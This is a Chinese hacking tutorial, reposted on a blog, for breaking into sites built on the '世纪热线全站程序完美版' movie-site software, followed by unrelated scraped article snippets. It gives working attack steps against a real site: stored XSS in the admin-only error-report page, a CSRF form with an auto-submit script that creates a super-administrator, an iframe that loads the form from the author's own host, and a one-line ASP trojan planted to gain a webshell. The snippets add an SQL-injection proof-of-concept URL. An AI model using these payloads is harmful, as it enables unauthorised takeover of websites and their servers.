linkboy
linkboy

跨出权限―世纪热线全站程序完美版漏洞利用

利用跨站,让管理员执行指定的动作,这个思路以前就在哪里看过,这里是个实例。

信息来源:http://www.hacklu.net
作者:樱花浪子[I.S.T]
注:本文首发于黑客手册,.转载请注明来源

06年就这样像3389离我而去,07年就像4489在迎接着我们。不知不觉又长了一岁。06年可以说是注入淡却的一年。不过新的技术也在增长。
跨站虽然算不上新的技术。但在国外也是非常重视的。其实跨站代码如果构造好的话可以干出很多事来的。这不,在网上逛到了一个电影网站。
心想如果把这个站拿下来不就可以看免费的电影了。(动机不太好呀^_^)。发现程序用的是:"世纪热线全站程序完美版"于是去百度搜一下也没发有漏
洞。那么就自己下回来慢慢研究吧。

可以说这套程序在注入方面防范的还不错。但是跨站方面好象就没有做到家了。经过仔细的查找,终于被我找到了一点软胁。首先我们先注册
个用户。一般电影网站都提供影片报错的页面。这个也不例外。我们在首页随便点击一个影片。下面有个报告错误。点一下之后会打开一个页面。
因为这个报告错误只有管理员能看,我们在报告错误里写上"<script>alert("樱花找漏洞了")</script>",如图1所示。

 

点开始报告,我们再去后台的电影管理/错误报告去看一下,跨站代码被成功执行了。如图2所示。

 

既然这个能执行,我们在来构造一些特殊的代码吧。后台有个添加管理员的,我们先来看看它的代码是怎么实现的,添加管理员的关键代码如下:
 

  
  
  
  
    
   
   
   
   
  1. <form method="post" action="saveuser1.asp" name="form1" onsubmit="javascript:return check();"> 
    2. 
   
   
   
   
  2.  <table width="396" border="0" cellspacing="1" cellpadding="0"> 
    3. 
   
   
   
   
  3.  <tr bgcolor="#0099FF"> 
    4. 
   
   
   
   
  4.  <td height="25" width="392"> 
    5. 
   
   
   
   
  5.  <div align="center"> 
    6. 
   
   
   
   
  6.  <font size="2">新增管理员</font></div> 
    7. 
   
   
   
   
  7.  </td> 
    8. 
   
   
   
   
  8.  </tr> 
    9. 
   
   
   
   
  9.  <tr> 
    10. 
   
   
   
   
  10.  <td height="30" style="color: black; border-style: none" width="253"> 
    11. 
   
   
   
   
  11.  <div align="center"> 
    12. 
   
   
   
   
  12.  <font size="2">用 户 名  <input type="text" name="username" size="20"> 
    13. 
   
   
   
   
  13.  </font> 
    14. 
   
   
   
   
  14.  </div> 
    15. 
   
   
   
   
  15.  </td> 
    16. 
   
   
   
   
  16.  <td height="30" style="color: black; border-style: none" width="138"> </td> 
    17. 
   
   
   
   
  17.  </tr> 
    18. 
   
   
   
   
  18.  <tr> 
    19. 
   
   
   
   
  19.  <td height="30" style="color: black; border-style: none" width="253"> 
    20. 
   
   
   
   
  20.  <div align="center"> 
    21. 
   
   
   
   
  21.  <font size="2">初始密码  <input type="password" name="newpin" size="20"> 
    22. 
   
   
   
   
  22.  </font> 
    23. 
   
   
   
   
  23.  </div> 
    24. 
   
   
   
   
  24.  </td> 
    25. 
   
   
   
   
  25.  <td height="30" style="color: black; border-style: none" width="138"> 
    26. 
   
   
   
   
  26.  <span lang="zh-cn"><font size="2">数字+字母10位以上</font></span></td> 
    27. 
   
   
   
   
  27.  </tr> 
    28. 
   
   
   
   
  28.  <tr> 
    29. 
   
   
   
   
  29.  <td height="30" style="color: black; border-style: none" width="253"> 
    30. 
   
   
   
   
  30.  <div align="center"> 
    31. 
   
   
   
   
  31.  <font size="2">确认密码  <input type="password" name="re_newpin" size="20"> 
    32. 
   
   
   
   
  32.  </font> 
    33. 
   
   
   
   
  33.  </div> 
    34. 
   
   
   
   
  34.  </td> 
    35. 
   
   
   
   
  35.  <td height="30" style="color: black; border-style: none" width="138"> 
    36. 
   
   
   
   
  36.  <span lang="zh-cn"><font size="2">数字+字母10位以上</font></span></td> 
    37. 
   
   
   
   
  37.  </tr> 
    38. 
   
   
   
   
  38.  <tr> 
    39. 
   
   
   
   
  39.  <td height="30" style="color: black; border-style: none" width="253"> 
    40. 
   
   
   
   
  40.  <p align="center"><span lang="zh-cn">&nbsp;</span>权限设置 <span lang="zh-cn">&nbsp;  
    41. 
   
   
   
   
  41.  </span><select size="1" name="flag"> 
    42. 
   
   
   
   
  42.  <option selected value="4">====无管理权限====</option> 
    43. 
   
   
   
   
  43.  <option value="3">====初级管理员====</option> 
    44. 
   
   
   
   
  44.  <option value="2">====高级管理员====</option> 
    45. 
   
   
   
   
  45.  <option value="1">====超级管理员====</option> 
    46. 
   
   
   
   
  46.  </select></td> 
    47. 
   
   
   
   
  47.  <td height="30" style="color: black; border-style: none" width="138"> </td> 
    48. 
   
   
   
   
  48.  </tr> 
    49. 
   
   
   
   
  49.  </table> 
    50. 
   
   
   
   
  50.  <p><input type="submit" name="Submit" value="确定"> </p> 
    51. 
   
   
   
   
  51.  </form> 
    52.

其实这个我们只在稍稍改动一下就可以了,改好的代码如下:
 

  
  
  
  
    
   
   
   
   
  1. <form method="post" action="http://127.0.0.1/admin/saveuser1.asp"> 
    2. 
   
   
   
   
  2.  <table width="396" border="0" cellspacing="1" cellpadding="0"> 
    3. 
   
   
   
   
  3.  <tr bgcolor="#0099FF"> 
    4. 
   
   
   
   
  4.  <td height="25" width="392"> 
    5. 
   
   
   
   
  5.  <div align="center"> 
    6. 
   
   
   
   
  6.  <font size="2">新增管理员</font></div> 
    7. 
   
   
   
   
  7.  </td> 
    8. 
   
   
   
   
  8.  </tr> 
    9. 
   
   
   
   
  9.  <tr> 
    10. 
   
   
   
   
  10.  <td height="30" style="color: black; border-style: none" width="253"> 
    11. 
   
   
   
   
  11.  <div align="center"> 
    12. 
   
   
   
   
  12.  <font size="2">用 户 名  <input type="text" name="username" size="20" value="hacklu119"> '添加管理员名字  
    13. 
   
   
   
   
  13.  </font> 
    14. 
   
   
   
   
  14.  </div> 
    15. 
   
   
   
   
  15.  </td> 
    16. 
   
   
   
   
  16.  <td height="30" style="color: black; border-style: none" width="138"> </td> 
    17. 
   
   
   
   
  17.  </tr> 
    18. 
   
   
   
   
  18.  <tr> 
    19. 
   
   
   
   
  19.  <td height="30" style="color: black; border-style: none" width="253"> 
    20. 
   
   
   
   
  20.  <div align="center"> 
    21. 
   
   
   
   
  21.  <font size="2">初始密码  <input type="password" name="newpin" size="20" value="hack11911"> '添加管理员密码  
    22. 
   
   
   
   
  22.  </font> 
    23. 
   
   
   
   
  23.  </div> 
    24. 
   
   
   
   
  24.  </td> 
    25. 
   
   
   
   
  25.  <td height="30" style="color: black; border-style: none" width="138"> 
    26. 
   
   
   
   
  26.  <span lang="zh-cn"><font size="2">数字+字母10位以上</font></span></td> 
    27. 
   
   
   
   
  27.  </tr> 
    28. 
   
   
   
   
  28.  <tr> 
    29. 
   
   
   
   
  29.  <td height="30" style="color: black; border-style: none" width="253"> 
    30. 
   
   
   
   
  30.  <div align="center"> 
    31. 
   
   
   
   
  31.  <font size="2">确认密码  <input type="password" name="re_newpin" size="20" value="hack11911"> '确认管理员密码  
    32. 
   
   
   
   
  32.  </font> 
    33. 
   
   
   
   
  33.  </div> 
    34. 
   
   
   
   
  34.  </td> 
    35. 
   
   
   
   
  35.  <td height="30" style="color: black; border-style: none" width="138"> 
    36. 
   
   
   
   
  36.  <span lang="zh-cn"><font size="2">数字+字母10位以上</font></span></td> 
    37. 
   
   
   
   
  37.  </tr> 
    38. 
   
   
   
   
  38.  <tr> 
    39. 
   
   
   
   
  39.  <td height="30" style="color: black; border-style: none" width="253"> 
    40. 
   
   
   
   
  40.  <p align="center"><span lang="zh-cn">&nbsp;</span>权限设置 <span lang="zh-cn">&nbsp;  
    41. 
   
   
   
   
  41.  </span><select size="1" name="flag"> 
    42. 
   
   
   
   
  42.  <option selected value="1">====无管理权限====</option> '设置为超级管理员,注意这里是1  
    43. 
   
   
   
   
  43.  <option value="3">====初级管理员====</option> 
    44. 
   
   
   
   
  44.  <option value="2">====高级管理员====</option> 
    45. 
   
   
   
   
  45.  <option value="1">====超级管理员====</option> 
    46. 
   
   
   
   
  46.  </select></td> 
    47. 
   
   
   
   
  47.  <td height="30" style="color: black; border-style: none" width="138"> </td> 
    48. 
   
   
   
   
  48.  </tr> 
    49. 
   
   
   
   
  49.  </table> 
    50. 
   
   
   
   
  50.  <p><input type="submit" name="Submit" value="确定"> </p> 
    51. 
   
   
   
   
  51.  
    52. 
   
   
   
   
  52.  <p> </p> 
    53. 
   
   
   
   
  53.  <p align="center"> 
    54. 
   
   
   
   
  54. <script language="javascript"> '用javascript脚本叫程序自动运行  
    55. 
   
   
   
   
  55. this.document.forms[0].submit()  
    56. 
   
   
   
   
  56. </script> 
    57. 
   
   
   
   
  57. </div> 
    58. 
   
   
   
   
  58. </form> 
    59. 
   
   
   
   
  59.  
    60.

最重要的就是action后的路径和最后自动运行的脚本,路径大家一定要对上。把上面的代码为hacklu.htm上传到自己的空间。然后再来到错误
报告的地方写上我们的挂马代码: <iframe src=http://www.hacklu.net/tu/hacklu.htm width=0 height=0></iframe> ,www.hacklu.net是我空
间的地址。这样管理员在看错误报告的时候就会添加一个名为:hacklu119的超级管理员。如图3、图4所示。

 

 

其实我们还可以构造备份WEBSHELL什么的,只是这个后台没有备份数据库的功能。所以得到WEBSHELL有一定的困难。刚开始我在添加电影的地
方上传ASP木马。又是抓名又是改扩展名的,可惜还没有成功。后来不经意发现原来这个数据库是ASP的,那么就好办了。只接在添加电影的地方
写上我们的一句话的ASP木马,如图5所示。

 

最后添加一下我们用客户端连接 http://127.0.0.1/data/jdzcn.asp 如图6所示,连接成功后会生成killbase.asp文件。最后成功得到WEBSHELL。见图7。

 

 

不过如果数据库改了名字的话,那么得WEBSHELL就不容易了。最后欢迎大家到NOHACK/BBS和我交流。我的ID是樱花浪子。 < type="text/javascript"> < src=\'#\'" href="http://pagead2.googlesyndication.com/pagead/show_ads.js">http://pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript">

本文来自CSDN博客,转载请标明出处:http://blog.csdn.net/linkboy2004/archive/2007/04/15/1565483.aspx

你可能感兴趣的:(漏洞,权限,世纪,热线,全站)

  • 微服务下功能权限与数据权限的设计与实现 nbsaas-boot 微服务java架构
    在微服务架构下,系统的功能权限和数据权限控制显得尤为重要。随着系统规模的扩大和微服务数量的增加,如何保证不同用户和服务之间的访问权限准确、细粒度地控制,成为设计安全策略的关键。本文将讨论如何在微服务体系中设计和实现功能权限与数据权限控制。1.功能权限与数据权限的定义功能权限:指用户或系统角色对特定功能的访问权限。通常是某个用户角色能否执行某个操作,比如查看订单、创建订单、修改用户资料等。数据权限:
  • mysql禁用远程登录 igotyback mysql
    去mysql库中的user表里,将host都改成localhost之后刷新权限FLUSHPRIVILEGES;
  • 三大师传 beca酱
    巴尔扎克的作品被誉为“法国社会的一面镜子”。文学大师维克多·雨果对巴尔扎克的评价是:“在最伟大的人物中间,巴尔扎克是名列前茅者;在最优秀的人物中间,巴尔扎克是佼佼者之一。”一个原本寂寂无名的小人物,从地中海的某个海岛上,只身一人来到巴黎,没有朋友,也没有名望。作为一个一文不名的外乡人,凭着赤手空拳赢得了巴黎,征服了整个法兰西,并且赢得了世界。这个人就是十九世纪法国伟大的军事家、政治家,法兰西第一帝
  • 数字里的世界17期:2021年全球10大顶级数据中心,中国移动榜首 张三叨
    你知道吗?2016年,全球的数据中心共计用电4160亿千瓦时,比整个英国的发电量还多40%!前言每天,我们都会创造超过250万TB的数据。并且随着物联网(IOT)的不断普及,这一数据将持续增长。如此庞大的数据被存储在被称为“数据中心”的专用设施中。虽然最早的数据中心建于20世纪40年代,但直到1997-2000年的互联网泡沫期间才逐渐成为主流。当前人类的技术,比如人工智能和机器学习,已经将我们推向
  • SpringBlade dict-biz/list 接口 SQL 注入漏洞 文章永久免费只为良心 oracle数据库
    SpringBladedict-biz/list接口SQL注入漏洞POC:构造请求包查看返回包你的网址/api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,md5(1),0x7e),1)=1漏洞概述在SpringBlade框架中,如果dict-biz/list接口的后台处理逻辑没有正确地对用户输入进行过滤或参数化查询(PreparedSta
  • CentOS的根目录下,/bin 和 /sbin 用途和权限 Energet!c Linux日常centoslinux运维
    CentOS的根目录下,/bin和/sbin用途和权限一、/bin(Binary)二、/sbin(SystemBinary)三、总结在CentOS的根目录下,/bin和/sbin目录有不同的用途和权限一、/bin(Binary)用途:存放系统的基本命令,这些命令对所有用户都是可用的。例如:ls、cp、mv、rm等。权限:普通用户和系统管理员都可以使用这些命令。二、/sbin(SystemBinar
  • 现代汉语粗糙版 文学史与经典 学习搬运工
    第十六章文学史与经典文学史的兴起在西方,虽然从亚里士多德开始,在人类的著述中已经可以找到文学史概念与写作方式的萌芽,但是,人们一般认为17世纪后期到18世纪是现代文学史写作真正开始的时期。长达百年波及整个欧洲的“古今之争”孕育出文学研究的历史意识,现代意义上的文学史观念在这场影响深远的论争中初见端倪。从18世纪晚期到19世纪初,由于席勒、弗·施莱格尔和赫尔德等人的介入,文学史研究逐渐变得复杂和成熟
  • 计算机木马详细编写思路 小熊同学哦 php开发语言木马木马思路
    导语:计算机木马(ComputerTrojan)是一种恶意软件,通过欺骗用户从而获取系统控制权限,给黑客打开系统后门的一种手段。虽然木马的存在给用户和系统带来严重的安全风险,但是了解它的工作原理与编写思路,对于我们提高防范意识、构建更健壮的网络安全体系具有重要意义。本篇博客将深入剖析计算机木马的详细编写思路,以及如何复杂化挑战,以期提高读者对计算机木马的认识和对抗能力。计算机木马的基本原理计算机木
  • 科幻游戏 《外卖员模拟器》 主要地理环境设定 (1) 穷人小水滴 游戏科幻设计
    游戏名称:《外卖员模拟器》(英文名称:waimai_se)作者:穷人小水滴本故事纯属虚构,如有雷同实属巧合.故事发生在一个(架空)平行宇宙的地球,21世纪(超低空科幻流派).相关文章:https://blog.csdn.net/secext2022/article/details/141790630目录1星球整体地理设定2巨蛇国主要设定3海蛇市主要设定3.1主要地标建筑3.2交通3.3能源(电力)
  • 《错嫁傻王:王妃她又黑化了》南君宥乔洛染(独家小说)精彩TXT阅读 海边书楼
    《错嫁傻王:王妃她又黑化了》南君宥乔洛染(独家小说)精彩TXT阅读主角:南君宥乔洛染简介:堂堂21世纪金牌特种兵乔洛染,穿来的第一天,就被人诬陷私通被逼投江。而前来解救她的,正是她的夫婿——智力受损的痴傻王爷南君宥。傻子娶了一个不贞女,全京城都在等着看他们的笑话。殊不知,乔洛染一手医术济天下,一手制毒退万敌。关注微信公众号【花车文学】去回个书號【36】,即可阅读【错嫁傻王:王妃她又黑化了】小说全文
  • 2018年12月23日 星期日 晴 刘一鸣妈妈
    早晨舒舒服服睡个懒觉,睁开眼已经快八点了。简单洗漱之后,准备吃早饭。嫂子给煎的牛排,七成熟,孩子吃的津津有味。我只能吃十二分熟的,可以外焦,不要里嫩。早饭后到世纪金源给然然选照片,几番挣扎后忍痛割爱删掉近百张,最后只保留三十张做相册。下午然然继续拍一套影楼赠送的台历照片,商家看到我带着孩子,也赠送了一套作为体验。拍照的过程特别欢乐,孩子很享受穿着帅气的衣服摆出帅帅的动作。然然拍过一套照片后明显找到
  • Kubernetes部署MySQL数据持久化 沫殇-MS KubernetesMySQL数据库kubernetesmysql容器
    一、安装配置NFS服务端1、安装nfs-kernel-server:sudoapt-yinstallnfs-kernel-server2、服务端创建共享目录#列出所有可用块设备的信息lsblk#格式化磁盘sudomkfs-text4/dev/sdb#创建一个目录:sudomkdir-p/data/nfs/mysql#更改目录权限:sudochown-Rnobody:nogroup/data/nfs
  • 第一周 艾希米
    好久没工作过了,第一天带着紧张和激动的心情去的办公室,害怕自己出什么差错,和大家也都是第一次见面,彼此之间都不熟悉。第一天在领导的培训️结束了。第二天去世纪星城小区做详细的楼层,单元,户数的记录,记得那天特别凉快,和越越一直到下午四点才完成了工作,越越还买了苹果分享给大家吃。第三天去万达广场考察了三个瑜伽馆,特别喜欢爱瑜伽的环境和销售,喜欢昕孕瑜伽教练的专业度和亲和力,对于空冥瑜伽真的不想说什么了
  • 2023-03-24 卯金刀_fafd
    美丽的伊犁河谷流失大半的伤痛伊犁河谷是祖国新疆一块美丽湿润的土地,有赛江南之美誉,这里风景秀丽,美如诗画,是中国最西部的湿地,在干旱的中亚是非常难得的一片肥美良田;原本整个伊犁河谷都是中国的领土,由于晚清腐败,导致失去了大片伊犁河谷,最终只留下小部分的土地,这是祖国的痛,这么美丽的土地失去了是整个中华民族永不可忘的痛,这一切的原因都是由于中俄《伊犁条约》签订。19世纪60~70年代,中国西北地区发
  • 演说:孩子嘴巴笨不会说话,如何提升自己的口才?#吴守立冬令营 吴守立国学智慧
    关键词:少年领袖演说班国学吴守立国学天第书院论语吴守立在现代社会,口才已是一个人综合素质和综合能力的具体体现,二十一世纪是“表达世纪”,要想在这个“表达世纪”里成人成才,“会说”“会写”必不可少,随着新课改、升学对孩子表达能力提出更高的要求,口才将是我们每个人必修课和基本功。然而,孩子嘴巴笨不会说话,如何提升自己的口才?天第书院为大家介绍以下几种方法。1、父母做孩子最佳的倾听者和沟通者在孩子天性中
  • 《疯狂的外星人》:生活本就如此荒诞,杀不死你的,终将成就你 职心眼儿
    文/董小琳了解电影较好的方法是知道它是如何说故事的。——法国评论家安德烈·巴顿早就听闻豆瓣评分6.4的《疯狂的外星人》,口碑两极分化——爱的人,喜欢它的搞笑,符合贺岁档合家欢的观影需求;骂的人,认为剧情牵强,漏洞百出,笑点牵强得像被人瘙痒。结果近54万观众的评分,一半以上的人只给到了及格,甚至还往下的分数。所以,《疯狂的外星人》就铁定是一部烂片了吗?今年过年,在家看了这部作品后,我想,如果电影自己
  • 管理员权限的软件不能开机自启动的解决方法 ss_ctrl
    这是几种解决方法:1.将启动参数写入到32位注册表里面去在64位系统下我们64位的程序访问此HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run注册表路径,是可以正确访问的,32位程序访问此注册表路径时,默认会被系统自动映射到HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft
  • Java面试笔记记录6 今天背八股了吗 java面试笔记
    1.Spring是什么?特性?有哪些模块?Spring是一个轻量级、非入侵式的控制反转Ioc和面向切面AOP的框架。特性:1.Ioc和DISpring的核心就是一个大的工厂容器,可以维护所有对象的创建和依赖关系,Spring工厂用于生成Bean,并且管理Bean的生命周期,实现高内聚低耦合的设计理念。2.AOP编程Spring提供面向切面编程,可以方便实现对程序进行权限拦截、运行监控等切面功能。3
  • 陈悦 | 科学学的起源及其发展 斐夷所非 sciencehistory科学学
    作者|陈悦20世纪初,随着科学技术的迅猛发展和科学社会学的兴起,科学学逐渐得到关注和研究。经过百年的发展,科学学正成为一门重要的交叉学科,对科技发展和社会进步产生了深远影响。面对百年未有之大变局加速演进,尤其是世界各国都把目光聚焦于科技,希望通过科技创新找到适应变局的出路时,科学学更凸显其必要性。因此,《世界科学》杂志开设“科学学探索”栏目。一方面,促进更多的人加入科学学的研究和讨论中,深入探讨科
  • Python编写简单登录系统的完整指南 qq_35430208 pythonpython开发语言Python编写简单登录系统登录系统
    在现代应用中,用户认证和登录系统是一个非常重要的功能。通过登录系统,应用能够识别用户的身份,并为其提供相应的权限和服务。本文将介绍如何使用Python编写一个简单的登录系统,包括用户注册、登录验证、密码加密等功能。通过这一教程,将学习如何构建一个基本的用户登录系统,并理解其中的关键技术。系统需求分析一个基本的登录系统应该具备以下功能:用户注册:新用户可以创建账号,系统会将用户名和密码存储起来。登录
  • 上传文件到钉盘流程详解 jspyth 开发场景案例分析开发语言java后端
    文章目录前言准备工作实现过程Maven依赖封装一个工具类获取文件上传信息unionId获取钉盘目录spaceId创建上传到钉盘前言  本文详解如何通过钉钉的API实现上传文件到钉盘目录,代码通过JAVA实现。准备工作1、在钉钉开发者后台创建一个钉钉企业内部应用;2、创建并保存好应用的appKey和appSecret,后面用于获取调用API的请求token;3、应用中配置好所需权限:企业存储文件上传
  • linux open详解,Linux系统open函数详解 墨剑心 linuxopen详解
    Linux系统中open函数主要作用就是打开和创建文件,可以根据参数来定制我们需要的文件的属性和用户权限等各种参数,下面良许教程网为大家分享一下Linux系统open函数具体使用方法。一、open函数用来干什么open函数在Linux下一般用来打开或者创建一个文件,我们可以根据参数来定制我们需要的文件的属性和用户权限等各种参数。二、open函数的定义和参数我们首先来看下open函数在Linux下的
  • Presto【基础 01】简介+架构+数据源+数据模型 2401_84254343 程序员架构
    一个Catalog包含Schema和Connector。例如,配置JMX的Catalog,通过JXMConnector访问JXM信息。当执行一条SQL语句时,可以同时运行在多个Catalog。Presto处理table时,是通过表的完全限定(fully-qualified)名来找到Catalog。例如,一个表的权限定名是hive.test_data.test,则test是表名,test_data是
  • SpringSecurity初学总结 weixin_66442229 spring
    springSecurity安全框架基于Java的安全框架主要有:SpringSecurity和Shiro介绍基础概念安全框架是对用户访问权限的控制,保证应用的安全性。其主要的工作是用户认证和用户授权|鉴权主要应用于Spring的企业应用系统,提供声明式的安全访问控制解决方案。它提供了一组可以在Spring应用上下文中配置的Bean能很好的结合Spring的DI依赖注入和AOP面向切面编程功能应用
  • first&second tmax
    first:#!/bin/bashfilm="thefirstfilm"echo"$film"./second#创建子进程运行second,在子进程地址空间运行secondecho"$film"second:#!/bin/bashecho"$film"film="thesecondfilm"echo"$film"对first、second添加可执行权限后执行./first结果thefirstfil
  • 普希金简介 周瑞晨
    普希金(1799-1837),俄国诗人。生于莫斯科。俄罗斯近代文学的奠基者和俄罗斯文学语言的创建者。他使俄罗斯文学走上了现实主义的道路,进入了世界文学的先进行列。主要作品有长诗《叶普盖尼.奥涅金》等。亚历山大·谢尔盖耶维奇·普希金(1799-1837年)是俄罗斯伟大的民族诗人,是俄罗斯现实主义文学的奠基人,是俄罗斯文学语言的创造者,更是19世纪世界诗坛的一座高峰。普希金是时代的宠儿,也是时代的旗帜
  • 锋哥写一套前后端分离Python权限系统 基于Django5+DRF+Vue3.2+Element Plus+Jwt 视频教程 ,帅呆了~~ java1234_小锋 Python权限系统django权限系统pythonweb权限系统djangoDRFVUE权限python
    大家好,我是java1234_小锋老师,最近写了一套【前后端分离Python权限系统基于Django5+DRF+Vue3.2+ElementPlus+Jwt】视频教程,持续更新中,计划月底更新完,感谢支持。视频在线地址:打造前后端分离Python权限系统基于Django5+DRF+Vue3.2+ElementPlus+Jwt视频教程(火爆连载更新中..)_哔哩哔哩_bilibili项目介绍本课程采
  • 今年最值得期待的美股IPO(一):网约车巨头优步 HOX币股世界
    2018年是IPO大年,2019年可能更加“热闹”,包括Uber、Lyft、Palantir、Pinterest等公司都计划上市。在“今年最值得期待的美股IPO”系列文章中,将盘点今年最受市场关注的美股IPO。今年Lyft和Uber的先后上市令网约车行业成为焦点,尤其是优步。据悉,仍处于亏损状态的优步估值可能高达1200亿美元,这将是纳斯达克100指数公司平均估值的两倍以上,比起3M、21世纪福克
  • 抖音小黄车怎么开?抖音小黄车开通方法? 日常购物技巧呀
    抖音不仅可以刷短视频,用户还可以在抖音上卖商品,开通小黄车之后就可以卖商品啦,开通小黄车之前,需要申请开通商品橱窗功能;首先打开【抖音短视频】,点开界面右上角的【搜索图标】,搜索【电商小助手】,点击【电商小助手】;选中关注旁边的【私信】,选择界面下方的【申请入口】,点击【商品分享权限】,满足【实名认证】、【进阶要求】之后,选择界面下方的【立即申请】即可;开通商品橱窗之后,就可以挂小黄车啦,方法是不
  • 悠悠岁月——(法)安妮·埃尔诺 欧阳云飞
    崭新的风格和出色的语言使《悠悠岁月》成为一部杰作,安妮·埃尔诺也因此当之无愧地跻身于法国当代第一流作家之列。——“21世纪年度最佳外国小说”评选委员会一种无人称自传,刚开始读还不了解作者的写作样式,有点茫然,摸不着头脑。但是读着读着就明白了作者的写作脉络,而且有点上头,停不下来。读的时候很畅快,有一种似曾相识的感觉,回想过去,再看看现在,仿佛两个平行时空串联起来,我们也恨不得穿越回去亲身经历时代的
  • ViewController添加button按钮解析。(翻译) 张亚雄 c
    <div class="it610-blog-content-contain" style="font-size: 14px"></div>//  ViewController.m //  Reservation software // //  Created by 张亚雄 on 15/6/2.
  • mongoDB 简单的增删改查 开窍的石头 mongodb
       在上一篇文章中我们已经讲了mongodb怎么安装和数据库/表的创建。在这里我们讲mongoDB的数据库操作       在mongo中对于不存在的表当你用db.表名 他会自动统计 下边用到的user是表明,db代表的是数据库       添加(insert):
  • log4j配置 0624chenhong log4j
    1) 新建java项目 2) 导入jar包,项目右击,properties—java build path—libraries—Add External jar,加入log4j.jar包。 3) 新建一个类com.hand.Log4jTest package com.hand; import org.apache.log4j.Logger; public class
  • 多点触摸(图片缩放为例) 不懂事的小屁孩 多点触摸
    多点触摸的事件跟单点是大同小异的,上个图片缩放的代码,供大家参考一下 import android.app.Activity; import android.os.Bundle; import android.view.MotionEvent; import android.view.View; import android.view.View.OnTouchListener
  • 有关浏览器窗口宽度高度几个值的解析 换个号韩国红果果 JavaScripthtml
    1 元素的 offsetWidth 包括border padding  content  整体的宽度。 clientWidth  只包括内容区 padding 不包括border。 clientLeft =  offsetWidth -clientWidth  即这个元素border的值 offsetLeft  若无已定位的包裹元素
  • 数据库产品巡礼:IBM DB2概览 蓝儿唯美 db2
    IBM DB2是一个支持了NoSQL功能的关系数据库管理系统,其包含了对XML,图像存储和Java脚本对象表示(JSON)的支持。DB2可被各种类型的企 业使用,它提供了一个数据平台,同时支持事务和分析操作,通过提供持续的数据流来保持事务工作流和分析操作的高效性。 DB2支持的操作系统 DB2可应用于以下三个主要的平台:   工作站,DB2可在Linus、Unix、Windo
  • java笔记5 a-john java
    控制执行流程: 1,true和false    利用条件表达式的真或假来决定执行路径。例:(a==b)。它利用条件操作符“==”来判断a值是否等于b值,返回true或false。java不允许我们将一个数字作为布尔值使用,虽然这在C和C++里是允许的。如果想在布尔测试中使用一个非布尔值,那么首先必须用一个条件表达式将其转化成布尔值,例如if(a!=0)。 2,if-els
  • Web开发常用手册汇总 aijuans PHP
    一门技术,如果没有好的参考手册指导,很难普及大众。这其实就是为什么很多技术,非常好,却得不到普遍运用的原因。 正如我们学习一门技术,过程大概是这个样子: ①我们日常工作中,遇到了问题,困难。寻找解决方案,即寻找新的技术; ②为什么要学习这门技术?这门技术是不是很好的解决了我们遇到的难题,困惑。这个问题,非常重要,我们不是为了学习技术而学习技术,而是为了更好的处理我们遇到的问题,才需要学习新的
  • 今天帮助人解决的一个sql问题 asialee sql
                今天有个人问了一个问题,如下: type     AD      value          A  
  • 意图对象传递数据 百合不是茶 android意图IntentBundle对象数据的传递
    学习意图将数据传递给目标活动; 初学者需要好好研究的       1,将下面的代码添加到main.xml中    <?xml version="1.0" encoding="utf-8"?> <LinearLayout xmlns:android="http:/
  • oracle查询锁表解锁语句 bijian1013 oracleobjectsessionkill
    一.查询锁定的表 如下语句,都可以查询锁定的表 语句一: select a.sid, a.serial#, p.spid, c.object_name, b.session_id, b.oracle_username, b.os_user_name from v$process p, v$s
  • mac osx 10.10 下安装 mysql 5.6 二进制文件[tar.gz] 征客丶 mysqlosx
    场景:在 mac osx 10.10 下安装 mysql 5.6 的二进制文件。 环境:mac osx 10.10、mysql 5.6 的二进制文件 步骤:[所有目录请从根“/”目录开始取,以免层级弄错导致找不到目录] 1、下载 mysql 5.6 的二进制文件,下载目录下面称之为 mysql5.6SourceDir; 下载地址:http://dev.mysql.com/downl
  • 分布式系统与框架 bit1129 分布式
    RPC框架 Dubbo 什么是Dubbo   Dubbo是一个分布式服务框架,致力于提供高性能和透明化的RPC远程服务调用方案,以及SOA服务治理方案。其核心部分包含:    远程通讯: 提供对多种基于长连接的NIO框架抽象封装,包括多种线程模型,序列化,以及“请求-响应”模式的信息交换方式。    集群容错: 提供基于接
  • 那些令人蛋痛的专业术语 白糖_ springWebSSOIOC
    spring 【控制反转(IOC)/依赖注入(DI)】: 由容器控制程序之间的关系,而非传统实现中,由程序代码直接操控。这也就是所谓“控制反转”的概念所在:控制权由应用代码中转到了外部容器,控制权的转移,是所谓反转。 简单的说:对象的创建又容器(比如spring容器)来执行,程序里不直接new对象。 Web 【单点登录(SSO)】:SSO的定义是在多个应用系统中,用户
  • 《给大忙人看的java8》摘抄 braveCS java8
    函数式接口:只包含一个抽象方法的接口 lambda表达式:是一段可以传递的代码       你最好将一个lambda表达式想象成一个函数,而不是一个对象,并记住它可以被转换为一个函数式接口。 事实上,函数式接口的转换是你在Java中使用lambda表达式能做的唯一一件事。   方法引用:又是要传递给其他代码的操作已经有实现的方法了,这时可以使
  • 编程之美-计算字符串的相似度 bylijinnan java算法编程之美
    public class StringDistance { /** * 编程之美 计算字符串的相似度 * 我们定义一套操作方法来把两个不相同的字符串变得相同,具体的操作方法为: * 1.修改一个字符(如把“a”替换为“b”); * 2.增加一个字符(如把“abdd”变为“aebdd”); * 3.删除一个字符(如把“travelling”变为“trav
  • 上传、下载压缩图片 chengxuyuancsdn 下载
    /** * * @param uploadImage --本地路径(tomacat路径) * @param serverDir --服务器路径 * @param imageType --文件或图片类型 * 此方法可以上传文件或图片.txt,.jpg,.gif等 */ public void upload(String uploadImage,Str
  • bellman-ford(贝尔曼-福特)算法 comsci 算法F#
    Bellman-Ford算法(根据发明者 Richard Bellman 和 Lester Ford 命名)是求解单源最短路径问题的一种算法。单源点的最短路径问题是指:给定一个加权有向图G和源点s,对于图G中的任意一点v,求从s到v的最短路径。有时候这种算法也被称为 Moore-Bellman-Ford 算法,因为 Edward F. Moore zu 也为这个算法的发展做出了贡献。 与迪科
  • oracle ASM中ASM_POWER_LIMIT参数 daizj ASMoracleASM_POWER_LIMIT磁盘平衡
    ASM_POWER_LIMIT 该初始化参数用于指定ASM例程平衡磁盘所用的最大权值,其数值范围为0~11,默认值为1。该初始化参数是动态参数,可以使用ALTER  SESSION或ALTER  SYSTEM命令进行修改。示例如下: SQL>ALTER  SESSION  SET   Asm_power_limit=2;
  • 高级排序:快速排序 dieslrae 快速排序
